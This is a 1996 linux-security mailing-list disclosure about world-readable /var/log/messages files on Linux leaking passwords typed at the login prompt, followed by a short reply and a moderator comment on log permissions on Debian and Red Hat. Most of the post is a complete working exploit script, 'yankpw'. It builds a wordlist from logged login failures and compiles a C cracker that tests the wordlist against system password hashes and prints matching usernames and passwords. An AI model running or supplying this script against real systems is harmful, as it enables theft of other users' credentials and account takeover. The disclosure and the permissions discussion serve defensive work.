linux security - Dec 1996 - LINUX:/var/log/messages world readable

[Mod: in a disk crash I lost the original of this message  posted by Dave to
linux-security so this one is from bugtraq, reposted with author''s
permission -- alex]

This old problem refuses to die.

#!/bin/sh
#
# yankpw
#
# Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0)
# /var/log/messages is world readable. If a user types in his password at
# the login prompt, it may get logged to /var/log/messages.
#
# I could swear this topic has been beaten to death, but I still see this
# problem on every linux box I have access to.
#
# Dave G.
# 12/06/96
# <daveg@escape.com>
# http://www.escape.com/~daveg

echo Creating Dictionary from /var/log/messages, stored in /tmp/messages.dict.$$

grep "LOGIN FAILURE" /var/log/messages | cut -d'',''
-f2 | cut -c2- | sort | uniq >> /tmp/messages.dict.$$

if [ ! -e ./scrack ]
then
   echo "Creating scrack.c"
   cat << ! > scrack.c
#include <stdio.h>
#include <unistd.h>
#include <pwd.h>
#include <sys/types.h>
#define get_salt( d, s ) strncpy( d, s, 2 )
void
main(argc,argv)
int argc;
char **argv;
{
   struct passwd *pwd;
   FILE *fp;
   char buff[80], salt[3], *encrypted_string;

   if ( ( fp = fopen( argv[1], "r" ) ) == NULL )
   {
      fprintf( stderr, "Couldnt find dict file\n" );
      exit(1);
   }
   while ( fgets( buff, 80, fp ) != NULL )
   {
      setpwent();
      buff[strlen(buff)-1]=''\0'';
      while ( ( pwd = getpwent() ) != NULL )
      {
        if ( strcmp( (*pwd).pw_passwd, "*" ) != 0 &&
           ( strlen( (*pwd).pw_passwd ) == 13 ) )
        {
           get_salt(salt, (*pwd).pw_passwd );

           encrypted_string = crypt( buff, salt );
           if ( strcmp( encrypted_string, (*pwd).pw_passwd ) == 0 )
           {
             fprintf( stdout, "l: %s p: %s\n", (*pwd).pw_name, buff);
             fflush(stdout);
           }
         }
      }
   }
}
!
   echo "Creating scrack"
   cc -O6 -fomit-frame-pointer -s -o scrack scrack.c
fi

./scrack /tmp/messages.dict.$$

echo /tmp/messages.dict.$$, ./scrack, and ./scrack.c still exist, delete them
yourself.

On Tue, 10 Dec 1996, Dave G. wrote:
> #!/bin/sh
> #
> # yankpw
> #
> # Under a lot of linux distributions(I know Redhat 3.0.3 and Slackware 3.0)
> # /var/log/messages is world readable. If a user types in his password at
> # the login prompt, it may get logged to /var/log/messages.
> #
> # I could swear this topic has been beaten to death, but I still see this
> # problem on every linux box I have access to.
On my Debian 1.1 system, the information is logged to /var/log/auth.log,
which has these default permissions:

    -rw-r-----   1 root     adm          1897 Dec 14 15:33 auth.log

Still readable by anyone in group adm, but not as dangerous as the
world-readable messages file (which, I believe, can stay world-readable on
most systems for convenience to users).

I don''t know what the latest Red Hat would do.

[mod: That is actually the way it should be. I personally a) have the
root password and b) want to be able to browse the messages files for
interesting stuff. I''d then add my useraccount to the group adm to be
able to freely do that. Red Hat 4.0 has the "secure" logfile, but it
has 644 permissions, and the login failures get logged to the
"messages"
file anyway..... -- REW]

Avery